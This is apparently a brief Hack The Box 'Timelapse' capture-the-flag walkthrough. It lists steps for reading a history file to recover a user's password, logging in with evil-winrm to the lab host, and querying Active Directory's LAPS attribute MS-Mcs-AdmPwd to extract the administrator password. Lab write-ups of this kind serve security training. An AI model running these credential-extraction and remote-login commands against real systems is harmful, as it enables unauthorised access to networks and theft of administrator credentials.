dxWiz/HackTheBox/Timelapse/README.md

 Read the history file and you should be able to get the password for another user

 Access the user powershell with this command `└─$ evil-winrm -i 10.10.11.152 -u $USER -p $PASSWORD -S`

+Use this command to get the administrator password `Get-ADComputer -Filter * -Properties MS-Mcs-AdmPwd | Where-Object MS-Mcs-AdmPwd -ne $null | FT Name, MS-Mcs-AdmPwd` and once again login with `evil-winrm` to get the root flag.